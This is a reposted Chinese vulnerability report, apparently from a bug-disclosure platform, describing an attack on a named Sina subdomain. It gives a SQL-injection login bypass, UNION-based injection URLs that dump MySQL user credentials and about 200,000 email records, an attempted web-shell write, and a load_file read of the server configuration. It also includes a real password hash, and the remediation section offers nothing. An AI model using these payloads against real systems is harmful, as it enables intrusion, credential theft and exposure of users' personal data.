来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 后台直接用admin#39;or 1=1# 登陆 找到注入点MYSQL外连详细说明:目标站http://bes.sina.net进入后台 竟然还要账号密码。。开什么玩笑直接用户名admin#39; or 1=1#密码随意写123456 成功登陆ok点来点...
后台直接用admin'or 1=1# 登陆 找到注入点MYSQL外连
详细说明:目标站http://bes.sina.net 进入后台 竟然还要账号密码。。开什么玩笑 直接用户名admin' or 1=1# 密码随意写123456 成功登陆 ok 点来点去 找到个注入点http://bes.sina.net/content_detail.php?content_id=199 之后 http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user-- yaoya:*B30D63E3C0BEE74D8A017AD371EB8810F01093CC:Y:% 可以MYSQL外连 破解了MD5 madwolf 成功连上 数据库还不少啊 http://bes.sina.net/content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23 20W条邮箱啊。。可惜没密码 其他数据库不解释了 写入一句话不成功啊。。貌似目录没权限 读读配置吧 select load_file('/data0/apache/conf/extra/httpd-vhosts.conf') 完结。。 求证书+礼物啊。。 漏洞证明: http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user-- 修复方案: 怎么修复你们懂得 作者 灰太狼 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com